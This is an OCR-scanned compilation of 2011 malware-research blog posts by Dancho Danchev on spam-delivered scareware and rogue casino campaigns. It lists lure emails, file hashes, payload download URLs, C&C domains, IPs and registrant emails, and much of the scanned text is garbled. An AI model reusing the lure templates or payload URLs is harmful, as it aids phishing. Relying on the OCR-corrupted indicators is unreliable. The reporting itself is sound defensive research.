defender-ojbr.in - Email: fucknielsen8675@gmail.com 

defender-drnr.in - Email: 
sumanvcasquez2008@gmail.com 
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defender-nrpr.in - Email: burtonalba8156@gmail.com 
defender-kuts.in - Email: rogerfrancis3322@gmail.com 
defender-bcvs.in - Email: martinefinklea5375@gmail.com 
defender-grit.in - Email: anthonygaylard9887@gmail.com 
defender-hmfu.in - Email: Iynnbone8026@gmail.com 



defender-htlu.in - Email: jerihamann4163@gmail.com 

defender-aabv.in - Email: leonflanagan7681@gmail.com 

defender-ppdw.in - Email: 
divinakempton5670@gmail.com 

defender-wrhw.in - Email: bradsureshl406@gmail.com 

defender-wkiw.in - Email: otisvaladez7778@gmail.com 

defender-hipw.in - Email: angiejohansen9730@gmail.com 

defender-qfdx.in - Email: 
hokyeongyancey6369@gmail.com 

defender-xnnx.in - Email: sylviawulff2140@gmail.com 

defender-xkox.in - Email: ryanmartin7607@gmail.com 

The scareware domains have been registered using 
automatically registered email accounts at Gmail, as a pre¬ 
caution in an attempt to make it harder to expose the 
campaign by using a single email only. 

Monitoring of the campaign is ongoing. 

Related posts: 

• [6]SQL Injection Through Search Engines Reconnaissance 

• [7]Massive SQL Injections Through Search Engine's 
Reconnaissance - Part Two 

• [8]Massive SQL Injection Attacks - the Chinese Way 



• [9]Cybercriminals SQL Inject Cybercrime-friendly Proxies 
Service 

• [10]GoDaddy's Mass WordPress Blogs Compromise Serving 
Sea reware 

• [lljDissecting the WordPress Blogs Compromise at 
Network Solutions 

• [12]Yet Another Massive SQL Injection Spotted in the Wild 

• [13]Smells Like a Copycat SQL Injection In the Wild 

• [14]Fast-Fluxing SQL Injection Attacks 

• [15]Obfuscating Fast-fluxed SQL Injected Domains 

This post has been reproduced from [16]Dancho 
Danchev's blog. 

1. http://ddanchev.blo as pot.com/2QQ8/lQ/massive-sa l- 
ini ection-attacks-chinese.html 

2. http://ddanchev.blo as pot.com/2007/Q7/sal-in i ection- 
throu a h-search-en a ines.html 

3. http://ddanchev.blo as pot.com/2QQ9/Q4/massive-sa l- 
ini ections-throu a h-search.html 

4. 

http://communitv.websense.com/blo a s/securitvlabs/archive/ 
2011/03/31/update-on-lizamoon-mass-in i ection.as px 

5. 

http://www.virustotal.com/file-scan/report.html? 

id = cd902b92042435c2d70d4bf59acc2de8229bfc3676269 

61f76cQ3f 



























75dcd7e95c-1301586582 


6. http://ddanchev.blo as pot.com/2QQ7/Q7/sal-in i ection- 
throu a h-search-en a ines.html 

7. http://ddanchev.blo as pot.com/2QQ9/Q4/massive-sa l- 
ini ections-throu a h-search.html 

100 

8. http://ddanchev.blo as pot.com/2QQ8/lQ/massive-sa l- 
ini ection-attacks-chinese.html 

9. http://ddanchev.blo as pot.com/201Q/Q7/cvbercriminals- 
sal-ini ect-cvbercrime.html 

10. http://ddanchev.blo as pot.com/2QlQ/Q4/ a odaddvs-mass- 
wordpress-blo a s.html 

11. http://ddanchev.blo as pot.com/2Q10/Q4/dissectin a- 
wordpress-blo a s-compromise.html 

12. http://ddanchev.blo as pot.com/2QQ8/Q5/vet-another- 
massive-sal-in i ection.html 

13. http://ddanchev.blo as pot.com/2QQ8/Q7/smells-like- 
cop vcat-sal-in i ection-in.html 

14. http://ddanchev.blo as pot.com/2QQ8/Q5/fast-f1uxin a -sa l- 
ini ection-attacks.html 

15. http://ddanchev.blo as pot.com/2QQ8/Q7/obfuscatin a -fast- 
f1uxed-sal-in i ected.html 

16. http://ddanchev.blo as pot.com/ 


101 

























































1.4 


April 

102 


£ 


Spamvertised DHL Notifications Scareware 
Campaign (2011-04-04 16:44) 

Yet another currently spamvertised campaign is 
impersonating DHL for scareware serving purposes. 

Sample subjects: DHL notification #random number 

Sample message: Dear customer! The parcel was send 
your home address. And it will arrice within 7 bussness day. 

More information and the tracking number are attached in 
document below. Thank you. 2011 DHL International 

GmbH. All rights reserverd. 

Sample filenames: DHL_tracking.zip; doc.zip; dhl.zip 
Detection rates: 

dhl.exe - [l]Backdoor:Win32/Hostil.gen!A - Result: 22/40 
(55.0 %) 

MD5 : 87d778169ael4d934b92ce628b5cfde4 

SHA1 : 20787fde3b7fde64cc3892c4df9a4eb2a2515830 

SHA256: 

6b54ff520fa6ff504f5f2f0c33af8b92424f0b538a760f4eb983 

d76007d3fe54 


Downloads 


additional 

binary 

from 

puskovayaustanovka.ru/pusk2.exe 


46.161.20.66 


Email: 


ad- 


mi n@puskovayaustanovka.ru 

pusk2.exe - [2]Trojan.Fakealert.20509 - Result: 11/41 (26.8 
%) 

MD5 : a9be091eedea947f8626dll042e0d9be 

SHA1 : 9cld399d47a6ef6081553al01ab48fca61859db4 

SHA256: 

d4f5802a392c0851d5el9118d56cc8b578fla07085aa5772 

cbdcf484608ed094 


103 

K 

Upon execution phones back to the following domains: 


kynugypenihyf.com - Email: v8@ca4.ru 
cylakydugudi.com - Email: acts@free-id.ru 
fevahanybyvu.com - Email: fs@free-id.ru 
gicyxepomer.com - Email: tabs@yourisp.ru 
bemojewedowigo.com - Email: fs@free-id.ru 
sakafiduzipame.com - Email: build@ca4.ru 
wetotyger.com - Email: acts@free-id.ru 
kytevaviqopoci.com - Email: fs@free-id.ru 
wamojafadezy.com - Email: kilt@bz3.ru 
tetagyjaj.com - Email: kilt@bz3.ru 
jerakidukojoz.com - Email: wrap@cheapbox.ru 
cixovatywo.com - Email: frenzy@ca4.ru 
jafybobik.com - Email: force@ca4.ru 
nizokatahinery.com - Email: foxy@cheapbox.ru 
cujicaraso.com - Email: beret@ca4.ru 
zuzosahule.com - Email: only@free-id.ru 
gokuzajylot.com - Email: silks@ca4.ru 
jumonevetode.com - Email: silks@ca4.ru 
dafatesomyz.com - Email: zq@bz3.ru 
lukofymela.com - Email: silks@ca4.ru 



jebuponip.com - Email: lost@free-id.ru 
quxovasuced.com - Email: hp@ppmail.ru 
laqoduhisegu.com - Email: shot@bz3.ru 
xyseditacif.com - Email: hart@free-id.ru 
wylyxaqunowy.com - Email: mows@bz3.ru 
qepovexidysopy.com - Email: byob@yourisp.ru 
bebecebyt.com - Email: mows@bz3.ru 
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dihemehypuq.com - Email: shot@bz3.ru 

rumesexyzobuz.com - Email: dawn@bz3.ru 

gopilezavyxiro.com - Email: hush@bz3.ru 

hyvijinymut.com/1017000312 - 99.198.114.189 - returns 
OK 

Domains are respoding to the following ASs: AS18866; 
AS32097: 

quxovasuced.com - 69.50.209.139 

laqoduhisegu.com - 69.50.209.140 
wylyxaqunowy.com - 69.50.209.148 
qepovexidysopy.com - 69.50.209.149 
fevahanybyvu.com - 69.50.209.182 


bemojewedowigo.com - 69.50.209.183 
gicyxepomer.com - 69.50.209.184 
sakafiduzipame.com - 69.50.209.185 
wamojafadezy.com - 69.50.209.186 
kytevaviqopoci.com - 69.50.209.188 
jebuponip.com - 69.50.209.223 
cylakydugudi.com - 69.50.209.224 
wetotyger.com - 69.50.209.225 
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nizokatahinery.com - 69.197.161.202 
cujicaraso.com - 69.197.161.203 
kynugypenihyf.com - 69.197.161.204 
jafybobik.com - 69.197.161.205 
tetagyjaj.com - 99.198.114.98 
jerakidukojoz.com - 99.198.114.99 
gopilezavyxiro.com - 99.198.114.100 
cixovatywo.com - 99.198.114.101 
hyvijinymut.com - 99.198.114.189 
zuzosahule.com - 204.12.223.170 
jumonevetode.com - 204.12.223.171 



dafatesomyz.com - 204.12.223.172 
gokuzajylot.com - 204.12.223.173 
lukofymela.com - 204.12.223.174 
rumesexyzobuz.com - 204.12.223.186 
xyseditacif.com - 204.12.223.187 
dihemehypuq.com - 204.12.223.188 
bebecebyt.com - 204.12.223.189 
Monitoring of the campaign is ongoing. 

Related posts: 

[3] Spamvertised Post Office Express Mail (USPS) 
Emails Serving Malware 

[4] Spamvertised United Parcel Service notifications 
serve malware 

[5] Spamvertised FedEx Notifications Spread 
Malware 

[6] Spamvertised DHL Notification Malware Campaign 

[7] More Spamvertised DHL Notifications Spread 
Malware 

1 . 

http://www.virustotal.com/file-scan/report.html? 

id = 6b54ff520fa6ff5Q4f5f2f0c33af8b92424f0b538a760f4eb 

983d7 






6007 d3fe54-l 3019 24841 


2 . 

http://www.virustotal.com/file-scan/report.html? 

id = d4f58Q2a392c0851d5el9118d56cc8b578flaQ7085aa5 

772cbdcf4 

84608edQ94-1301925356 

3. http://ddanchev.blo as pot.com/2011/03/soamvertised- 
oost-office-exoress-mail.html 

4. http://ddanchev.blo as pot.com/2011/Q3/spamvertised- 
united-parcei-service.html 

5. http://ddanchev.blo as pot.com/2011/Q3/spamvertised- 
fedex-notificatiQns-spread.html 

6. http://ddanchev.blo as pot.com/2011/03/spamvertised-dhl- 
notifidcation-malware.html 

7. http://ddanchev.blo as pot.com/2011/Q3/more- 
s pamvertised-dhl-notifications.html 

106 


£ 


£ 


Summarizing Zero Day's Posts for March (2011-04- 
04 18:56) 

The following is a brief summary of all of my posts at 
ZDNet's Zero Day for March. You can subscribe to my 

[l]personal RSS feed, [2]Zero Day's main feed, or 

follow me on Twitter: 






























Recommended reading: 

• [3] Dear ISP, it's time to quarantine your malware-infected 
customers 

• [4] Zombie PC Prevention Bill to make security software 
mandatory 
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01. [5]Spamvertised 'You have received a gift from one of 
our members!' malware campaign 

02. [6]Report: malicious PDF files becoming the attack 
vector of choice 

03. [7]Ashton Kutcher's Twitter account hacked 

04. [8]Google tops comparative review of malicious search 
results - again 

05. [9]Report: 3 million malvertising impressions served per 
day 

06. [10]Dear ISP, it's time to quarantine your malware- 
infected customers 

07. [ll]SpyEye gets new DDoS functionality 

08. [12]Spamvertised DHL notifications lead to malware 

09. [13]Spamvertised FedEx notifications lead to malware 

10. [14]Rustock botnet's operations disrupted 

11. [15]Malicious Japan quake spam leads to scareware 



12. [16]Spamvertised United Parcel Service notifications 
lead to malware 

13. [17]Researchers release details on 34 SCADA 
vulnerabilities 

14. [18]Zombie PC Prevention Bill to make security software 
mandatory 

15. [19]Spamvertised Post Office Express Mail (USPS) 
emails lead to malware 

16. [20]New GpCode ransomware encrypts files, demands 
$125 for decryption 

17. [21]Mass SQL injection attack leads to scareware 

This post has been reproduced from [22]Dancho 
Danchev's blog. Follow him [23Jon Twitter. 

1. http://www.zdnet.com/tooics/dancho+danchev? 
o-l&mode=rss&ta a = mantle_skin : content 

2. http://feeds.feedburner.com/zdnet/securit v 

3. http://www.zdnet.com/blo a /securitv/dear-isp-its-time-to- 
g uarantine-vour-mal ware-infected-customers/6712 

4. http://www.zdnet.com/blo a /securitv/zombie-pc- 
prevention-bill-to-make-securitv-software-mandatorv/8487 

5. http://www.zdnet.com/blo a /securit v/s pamvertised-vou- 
have-received-a- a ift-from-one-of-our-members-malware- 

campai a n/8250 

6. http://www.zdnet.com/blo a /securitv/report-malicious-pdf- 
filies-becomin a -the-attack-vector-of-choice/8255 



































7. http://www.zdnet.com/blo a /securitv/ashton-kutchers- 
twitter-account-hacked/8280 

8. http://www.zdnet.com/blo a /securit v/aooa le-tops- 
comparative-review-of-malicious-search-results-a a ain/8306 

9. http://www.zdnet.com/blo a /securitv/report-3-million- 
malvertisin a -impressions-served-per-dav/8319 

10. http://www.zdnet.com/blo a /securitv/dear-isp-its-time-to- 
g uarantine-vour-mal ware-infected-customers/6712 

11. http://www.zdnet.com/blo a /securit v/spve ve- a ets-new- 
ddos-functionalitv/8381 

12. http://www.zdnet.com/blo a /securit v/s pamvertised-dhl- 
notifications-lead-to-mal ware/8415 

13. http://www.zdnet.com/blo a /securit v/s pamvertised-fedex- 
notifications-lead-to-mal ware/845 2 

14. http://www.zdnet.com/blo a /securitv/rustock-botnets- 
o perations-disrupted/8456 

15. http://www.zdnet.com/blo a /securitv/malicious- ia pan- 
a uake-spam-leads-to-scareware/8463 

16. http://www.zdnet.com/blo a /securit v/s pamvertised- 
united-parcel-service-notifications-lead-to-mal ware/8478 

17. http://www.zdnet.com/blo a /securitv/researchers-release- 
details-on-34-scada-vulnerabilities/8483 

18. http://www.zdnet.com/blo a /securitv/zombie-PC- 
prevention-bill-to-make-securitv-software-mandatorv/8487 

19. http://www.zdnet.com/blo a /securit v/s pamvertised-post- 
office-express-mail-usps-emails-lead-to-ma I ware/8502 







































































20. http://www.zdnet.com/blo a /securitv/new- g pcode- 

ransomware-encr v pts-files-demands-125-for- 

decr v ption/8505 


21. http://www.zdnet.com/blo a /securitv/mass-sal-in i ection- 
attack-leads-to-scareware/8510 

22. http://ddanchev.blo as pot.com/ 

23. http://twitter.com/danchodanchev 
108 

El 

Don't Play Poker on an Infected Table - Part Four 
(2011-04-11 18:10) 

A currently spamvertised campaign is enticing users into 
downloading and executing a fraudulent online gambling 

application known as VegasVIP setup.exe 

Detection rate: 

VegasVIP _setup.exe - [l]Win32/CazinoSilver - 
Result:16/42 (38.1 %) 

MD5 : 8680fa2868dd068f3cld3995dfl05243 

SHA1 : 4f3ecd72c223cf6el30377a3ecd9149232dc848b 

SHA256: 

68ded50bf7c9b7f6961e6334b25fdad5d2369e461051d5a9f 

alflebaadebldOe 

Upon execution, the sample phones back to: 



















www.onlinevegas.com/download/update.php? 
dl=0af374526b7b6eb6c54bf92cbld la236 
&status=10 

The spammers are earning revenue by participating in the 
BestCasinoPartner.com Affiliate Program. More de¬ 
tails: 

11 Turn Your Traffic Into BIG Monthly Cash! Join the 
BestCasinoPartner.com Affiliate Program and from the very 
start 109 


£ 


you will earn a HUGE 30 % of ALL player GROSS losses 
EVERY month, no matter what your volume is! That's ALL 

player GROSS losses for the life of your referred players, 
with No Loss Carry-Forward! 

Refer an Affiliate: Get Even More. Earn 7 % override on the 
Casino Gross Revenue payment made to the re¬ 
ferred Affiliate for all players referred by your directly 
referred Affiliates - for the life of the player! Earn 5 % 
override on the Casino Gross Revenue payment made from 
your Web masters' referrals! AND... we even go One Step 
Further 

— a THIRD tier! 

Here are the THREE levels that will earn you profits for the 
life EACH player: 

• Tier 1: 7 % override on the Casino Gross Revenue 

• Tier 2: 5 % override on the Casino Gross Revenue 


• Tier 3: 3 % override on the Casino Gross Revenue" 

Participating affiliate domains are: OnlineVegas.com; 
GoCasino.com; CrazySlots.com and GrandVegas.com 

Related fraudulent online gambling domains part of the 
campaign: 

777fashionplays.ru 

777playsfashion.ru 
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bankpremiumplays.ru 

bank-premium-plays.ru 

bestfortuneplays.ru 

best-fortune-plays.ru 

bestplaysfortune.ru 

best-plays-fortune.ru 

bingobonusplays.ru 

bonus-bingo-plays.ru 

bonusplaysbingo.ru 

bonus-plays-bingo.ru 

class-plays-world.ru 

class-world-plays.ru 

crazyplaysroulette.ru 



crazy-plays-roulette.ru 

crazyrouletteplays.ru 

crazy-roulette-plays.ru 

elit-grand-games.ru 

elit-plays-king.ru 

fashion-plays-vegas.ru 

fashion-vegas-plays.ru 

fiveplaysstar.ru 

fortunebestplays.ru 

fortune-best-plays.ru 

fortuneplaysbest.ru 

fortune-plays-best.ru 

fortune-plays-land.ru 

fortuneplaysparty.ru 

fortune-plays-party.ru 

games-elit-king.ru 

games-king-elit.ru 

gamespremiumbank.ru 

jokerplaysvegas.ru 

online-games-luxory.ru 



palaceplayscrystal.ru 

playsbankpremium.ru 

plays-bank-premium.ru 

playsbestfortune.ru 

plays-best-fortune.ru 

plays-bingo-bonus.ru 

playsbonusbingo.ru 

plays-bonus-bingo.ru 

playsclassworld.ru 

playscrazyroulette.ru 

plays-crazy-roulette.ru 

playscrystalpalace.ru 

plays-crystal-palace.ru 

playsfashion777.ru 

playsfivestar.ru 

playsfortunebest.ru 

plays-fortune-party.ru 
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playsonlineextra.ru 

plays-plaza-west.ru 



playspremiumbank.ru 

playsroulettecrazy.ru 

plays-roulette-crazy.ru 

plays-royal-classic.ru 

plays-sta r-fi ve. ru 

playsvegasjoker.ru 

playswestplaza.ru 

plays-world-win.ru 

plaza-plays-west.ru 

plazawestplays.ru 

plaza-west-plays.ru 

premium-bank-plays.ru 

premiumplaysbank.ru 

roulette-crazy-plays.ru 

starfiveplays.ru 

star-five-plays.ru 

starplaysfive.ru 

vegas-fashion-plays.ru 

vegasjokergames.ru 

vegasjokerplays.ru 



vegas-joker-plays.ru 

vegas-plays-joker.ru 

westplaysplaza.ru 

west-plays-plaza.ru 

westplazaplays.ru 

west-plaza-plays.ru 

win-plays-world.ru 

winworldplays.ru 

win-world-plays, ru 

world-class-plays.ru 

world-plays-class.ru 

Related posts: 

[2] Don't Play Poker on an Infected Table - Part Three 

[3] Don't Play Poker on an Infected Table - Part Two 

[4] Don't Play Poker on an Infected Table 

This post has been reproduced from [5]Dancho Danchev's 
blog. Follow him [6Jon Twitter. 

1 . 

http://www.virustotal.com/file-scan/report.html? 

id = 68ded50bf7c9b7fS961e6334b25fdad5d2369e461051d 

5a9falfle 






baadebldOe-1302 535749 


2. http://ddanchev.blo as pot.com/2010/Q3/dont-pla v- poker- 
on-infected-table-part.html 

3. http://ddanchev.blo as pot.com/2010/Q2/dont-pla v- poker- 
on-infected-table-part.html 

4. http://ddanchev.blo as pot.eom/2007/09/dont-pla v- poker- 
on- i nfected-table.html 

5. http://ddanchev.blo as pot.com/ 

6. http://twitter.com/danchodanchev 
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Spamvertised "Reqest Rejected" Campaign Serving 
Scareware (2011-04-12 20:22) 

A currently spamvertised scareware-serving campaign is 
enticing end users into downloading and executing a 

malicious binary, which drops a scareware variant. 

Sample subject: Reqest rejected 

Sample message: " Dear Sirs, Thank you for your letter! 
Unfortunately we can not confirm your request! More 
information attached in document below. Thank you Best 
regards. 11 

Sample attachments: EX-38463.pdf.zip; EX- 
38463.pdf.exe 


Detection rate: 




















EX-38463.pdf.exe - 

[l]TrojanDownloader:Win32/Chepvil.J - Result: 11/41 
(26.8 %) 

MD5 : 5085794e6c283ebcfa3878805b9e7be7 

SHA1 : Ifbd8d3b0a3479274d8f09543452bf724bcb245c 

SHA256: 

C03711dbafae9b296daed8720f997d84caa5e5a5407a6899 

26050a061d67b932 

Upon execution downloads hdjfskh.net/ pusk.exe - 
208.43.90.48 - Email: admin@firtryt.biz 

Detection rate: 

pusk.exe - [2]FakeAlert-CN.gen.aa - Result: 13/42 (31.0 
%) 

MD5 : a50a91176b5aeb96b8b77b99d587c485 

SHA1 : C56b7ab2123dbd49902446ffcc0cf59d6a865857 

SHA256: 

C912a975e3c2fc911d6550d86e8fd89dbd30e3dle07d788b 

45aac0d6cf61e83c 
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Upon execution phones back to the following domains and 
ASs: 

Phones back to : A519875; AS8001; A524940; AS32475; 
A532097; AS19875 


2bemojewedowigo.com - 78.46.105.205 


bemolaqijicy.com - 99.198.114.206 - Email: vista@free- 
id.ru 

celisesuho.com - 99.198.114.202 - Email: hush@bz3.ru 

cixovatywo.com - 78.46.105.205 - Email: frenzy@ca4.ru 

fytypoqywu.com - 64.46.38.94 - Email: 
fy4371215910301@domainidshield.com 

gicyxepomer.com - 78.46.105.205 - Email: 
tabs@yourisp.ru 

gopilezavyxiro.com - 78.46.105.205 - Email: 
hush@bz3.ru 

hivanedak.com - 188.95.54.242 - Email: steps@ppmail.ru 

hotilosire.com - 208.110.67.122 - Email: lathe@maillife.ru 

jerakidukojoz.com - 78.46.105.205 - Email: 
wrap@cheapbox.ru 

kupeqobujohaq.com - 64.46.38.145 - Email: 
soup@fastermail.ru 

kytevaviqopoci.com - 78.46.105.205 - Email: fs@free- 
id.ru 

pikilokykizanu.com - 65.254.54.77 - Email: dawn@free- 
id.ru 
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punajytapaci.com - 209.97.213.105 - Email: 
mire@maillife.ru 



qisacugugu.com - 64.46.38.129 - Email: as@free-id.ru 

qupajubica.com - 78.46.105.205 - Email: heard@bz3.ru 

reruravobosila.com - 67.196.13.96 - Email: 
mon@ppmail.ru 

rorodarof.com - 99.198.114.204 - Email: hush@bz3.ru 

ruqydahec.com - 67.196.13.97 - Email: mon@ppmail.ru 

sakafiduzipame.com - 78.46.105.205 - Email: 
build@ca4.ru 

sykobodyducib.com - 208.110.67.102 - Email: 
lathe@maillife.ru 

tetagyjaj.com - 78.46.105.205 - Email: kilt@bz3.ru 

tibehewuk.com - 209.97.213.102 - Email: mon@ppmail.ru 

tisatosyhimidy.com - 188.95.54.243 - Email: jan@free- 
id.ru 

tyhiqymiwufuj.com - 208.110.67.121 - Email: dawn@free- 
id.ru 

vakyditefo.com - 99.198.114.203 - Email: vista@free-id.ru 

wamojafadezy.com - 78.46.105.205 - Email: acts@free- 
id.ru 

wetotyger.com - 78.46.105.205 - Email: acts@free-id.ru 

wixecyhobovy.com - 64.46.38.130 - Email: 
soup@fastermail.ru 



wolycunanoqe.com - 72.9.233.98 - Email: 
lathe@maillife.ru 

zajatimibuj.com - 208.110.67.119 - Email: 
bark@cheapbox.ru 

zequcitamado.com - 99.198.114.205 - Email: vista@free- 
id.ru 

punajytapaci.com/1017000412 - 209.97.213.105 - 
Email: mire@maillife.ru 

tibehewuk.com/1017000412 - 209.97.213.102 - Email: 
mon@ppmail.ru 

Monitoring of the campaign is ongoing. 

This post has been reproduced from [3]Dancho Danchev's 
blog. Follow him [4Jon Twitter. 

1 . 

http://www.virustotal.com/file-scan/report.html? 

id = c03711dbafae9b296daed8720f997d84caa5e5a54Q7a68 

9926050a 

061dS7b932-1302627694 

2 . 

http://www.virustotal.com/file-scan/report.html? 

id = c912a975e3c2fc911d6550d86e8fd89dbd3Qe3dle07d7 

88b45aac0 

d6cf61e83c-1302627443 


3. http://ddanchev.blo as pot.com/ 














4. http://twitter.com/danchodanchev 
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Spamvertised "Successful! Order 977132" Leads to 
Scareware (2011-04-28 14:50) 

A currently ongoing malware campaign is impersonating 
Bobijou Inc for malware-serving purposes. 

Sample subject: " Successful/ Order 977132" 

Sample message: " Thank you for ordering from Bobijou 
Inc. This message is to inform you that your order has been 
received and is currently being processed. 

Your order reference is 901802. You will need this in all 
correspondence. This receipt is NOT proof of purchase. 

We will send a printed invoice by mail to your billing 
address. 

You have chosen to pay by credit card. Your card will be 
charged for the amount of 262.00 USD and "Bobijou 

Inc ." will appear next to the charge on your statement. You 
will receive a separate email confirming your order has 
been despatched. Your purchase and delivery information 
appears below in attached file. 

Thanks again for shopping at Bobijou Inc. " 

Sample attachments: Order_details.zip 


Detection rates: 



Order details.exe - [l]Trojan.FakeAV - Result: 24/40 (60.0 
%) 

MD5 : 7c810cbb47c9f937b5f663b51ab7ee50 

SHA1 : b4faf8c724727381abbllc44b71605ff6e65cbbf 

SHA256: 

0bda3bdcffdda0fee31fe35cfea2fb644ff8e549a0a83632faal 

9cd43e02b904 

Upon execution phones back to : 

kkojjors.net/f/g.php - 95.64.9.15 - Email: 
admin@firtryt.biz 

variantov.com/pusk.exe - 94.63.149.26 - Email: 
admin@variantov.com 

Detection rate for the scareware variant pusk.exe 

pusk.exe - [2]Suspicious.Cloud.5 - Result: 4/41 (9.8 %) 

MD5 : bbd466a67586003776e295eaf3d2976c 

SHA1 : 6a8eld84157c76b4c9238fc23d28686244f6650f 

SHA256: 

ee008f9039534f062bd277860060461064e760bdaa90a365 

95b9780be54a5a05 
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Upon execution phones back to: 


jyluzovunevu.com - 209.160.45.33 - Email: 
gray@fxmail.net 

sesokiqufikeg.com - 209.160.45.34 - Email: 
gray@fxmail.net 

qyqinisope.com - 64.46.38.207 - Email: gray@fxmail.net 

hijocyragap.com - 64.46.38.81 - Email: 
robin@cutemail.org 

puhigygapyhi.com - 64.46.38.81 - Email: gray@fxmail.net 

zavewuzykubo.com - 64.46.38.80 - Email: 
robin@cutemail.org 

fepigixypo.com - 64.46.38.29 - Email: pyre@cutemail.org 

tozibapah.com - 76.73.16.182 - Email: lays@fxmail.net 

qebinehuh.com - 76.73.14.182 - Email: lays@fxmail.net 

gygipikalyn.com - 76.73.17.242 - Email: ss@cutemail.org 

xygorinazecit.com - 76.73.17.70 - Email: ss@cutemail.org 

walireqoxyxyt.com - 64.46.39.185 - Email: 
orbit@fxmail.net 

moririnejuf.com - 64.46.39.184 - Email: 
purse@maill3.com 

jydosucin.com - 64.46.39.200 - Email: arm@fxmail.net 

libynozegokido.com - 64.46.39.186 - Email: 
orbit@fxmail.net 



zidacofodafur.com - 64.46.39.212 - Email: 
gown@cutemail.org 

fequxukovo.com - 67.196.15.136 - Email: arm@fxmail.net 

gyxyqimacik.com - 67.196.15.138 - Email: 
purse@maill3.com 

wizyvopyla.com - 67.196.15.137 - Email: arm@fxmail.net 

gyricehagupy.com - 67.196.15.139 - Email: 
purse@maill3.com 
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punemipaqatyc.com - 67.196.15.141 - Email: 
ulcer@mailae.com 

gehotigyry.com - 67.196.15.140 - Email: hp@maill3.com 

vufekihoto.com - 67.196.15.105 - Email: arm@fxmail.net 

huzomohidid.com - 67.196.15.104 - Email: 
arm@fxmail.net 

posufejez.com - 67.196.15.107 - Email: 
purse@maill3.com 

gewexyvunokyk.com - 67.196.15.106 - Email: 
purse@maill3.com 

fowyqypacytucy.com - 209.160.45.32 - Email: 
soup@fastermail.ru 

koduzuwobow.com - 209.160.45.130 - Email: 
pyre@cutemail.org 



ciluvekypomow.com - 78.46.105.205 - Email: 
hips@cutemail.org 

7hitaxodupi.com - 64.46.38.30 

Monitoring of the campaign is ongoing. 

Related posts: 

[3] Spamvertised "Reqest Rejected" Campaign Serving 
Sea reware 

[4] Spamvertised DHL Notifications Scareware Campaign 

[5] Spamvertised Post Office Express Mail (USPS) Emails 
Serving Malware 

[6] Spamvertised United Parcel Service notifications serve 
malware 

[7] Spamvertised FedEx Notifications Spread Malware 

[8] Spamvertised DHL Notification Malware Campaign 

[9] More Spamvertised DHL Notifications Spread Malware 

This post has been reproduced from [lOJDancho 
Danchev's blog. Follow him [ll]on Twitter. 

1 . 

http://www.virustotal.com/file-scan/report.html? 

id = 0bda3bdcffdda0fee31fe35cfea2fb644ff8e549a0a83632f 

aa!9c 

d43e02b904-1303915483 


2 . 







http://www.virustotal.com/file-scan/report.html? 

id = ee008f9039534f062bd2 77860060461064e760bdaa90a 

36595b978 

Qbe54a5a05-1303916125 

3. http://ddanchev.blo as pot.com/2011/Q4/spamvertised- 
reaest-re i ected-campai a n.html 

4. http://ddanchev.blo as pot.com/2011/Q4/spamvertised-dhl- 
notifications.html 

5. http://ddanchev.blo as pot.com/2011/Q3/spamvertised- 
post-office-express-mail.html 

6. http://ddanchev.blo as pot.com/2011/Q3/spamvertised- 
united-parcel-service.html 

7. http://ddanchev.blo as pot.com/2011/Q3/spamvertised- 
fedex-nofificatiQns-spread.html 

8. http://ddanchev.blo as pot.com/2011/Q3/spamvertised-dhl- 
notifi cication-malware.html 

9. http://ddanchev.blo as pot.com/2011/Q3/more- 
s pamvert i sed-dhl-notiiffcations.html 

10. http://ddanchev.blo as pot.com/ 

11. http://twitter.com/danchodanchev 
118 


1.5 


May 


119 










































Summarizing ZDNet's Zero Day Posts for April 
(2011-05-09 12:50) 

The following is a brief summary of all of my posts at 
ZDNet's Zero Day for April. You can subscribe to my 

[l]personal RSS feed, [2]Zero Day's main feed, or 

follow me on Twitter: 

Recommended reading: 

• [3] Netcraft survey indicates slow adoption of Extended 
Validation SSL certificates 

01. [4]Spamvertised "Reqest Rejected" campaign leads to 
scareware 

02. [5]Spamvertised 'Facebook. Your password has been 
changed!' emails lead to malware 
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03. [6]Malware Watch: 'Spam is sent from your FaceBook 
account'; Spamvertised malicious photos 04. 
[7]Spamvertised Easter Greetings lead to malware 

05. [8]Netcraft survey indicates slow adoption of Extended 
Validation SSL certificates 

06. [9]'You've got a postcard' emails lead to exploits and 
scareware 

07. [10]Fake antivirus for mobile platform spotted 


This post has been reproduced from [HJDancho 
Danchev's blog. Follow him [12]on Twitter. 

1. http://www.zdnet.com/toDics/dancho+danchev? 
o-l&mode=rss&ta a -mantle_skin : content 

2. http://feeds.feedburner.com/zdnet/securit v 

3. http://www.zdnet.com/blo a /securitv/netcraft-surve v- 
indicates-slow-ado ption-of-extended-validation-ssl-cer 

tificates/8576 

4. http://www.zdnet.com/blo a /securit v/s pamvertised-reaest- 
rei ected-campai a n-leads-to-scareware/8529 

5. http://www.zdnet.com/blo a /securit v/s pamvertised- 
facebook-vour-password-has-been-chan a ed-emails-lead-tQ- 
ma 


lware/8545 

6. http://www.zdnet.com/blo a /securitv/malware-watch- 
s pam-is-sent-from-vour-facebook-account-spamvertised-mal 

icious-photos/8565 

7. http://www.zdnet.com/blo a /securit v/s pamvertised-easter- 
a reetin a s-lead-to-mal ware/85 71 

8. http://www.zdnet.com/blo a /securitv/netcraft-surve v- 
indicates-slow-adoptiion-of-extended-vaiidation-ssl-cer 

tificates/8576 

9. http://www.zdnet.com/blo a /securit v/ vouve- a ot-a- 
postcard-emails-lead-to-exploits-and-scareware/8590 






















































10. http://www.zdnet.com/blo a /securitv/fake-antivirus-for- 
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11. http://ddanchev.blo as pot.com/ 

12. http://twitter.com/danchodanchev 
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Don't Play Poker on an Infected Table - Part Five 
(2011-05-09 15:52) 

A currently spamvertised campaign is enticing end users 
into downloading a fraudulent online gambling application 

KingSpinEN.exe. The campaign is part of last month's 
[l]Don't Play Poker on an Infected Table - Part Four series. 

Detection rate: 

KingSpinEN.exe - [2]W32/Casino.F.gen!Eldorado - 

Result:16/43 (37.2 %) 

MD5 : ead8156a838842bc8463995a91eee08b 

SHA1 : 239594a514c461c63dc8da69b08b9b63baaf2579 

SHA256: 

491c291eaed67268dl4a36470e5d6f6d4ed829055fe4a289 

7ac5f050b50a2e36 

Upon execution phones back to: 

- download.thepalacegroupgaming.com 

/tracking.aspx?ul=en &casino=spinpalace &banner 
_tag=a20337 &uuid = 











%7b9F9E0585-9340-45C0-9EC7-46FBE5E7127F %7d 
&state=100 

- spinpalace.mgsmup.com /mupp/spinpalace/spinpalace 
_install.cab 

- spinpalace.mgsmup.com 

/mupp/spin palace/spin palace.cab 

- download.thepalacegroupgaming.com 

/tracking.aspx?ul=en &casino=spinpalace &banner 
_tag=a20337 &uuid = 

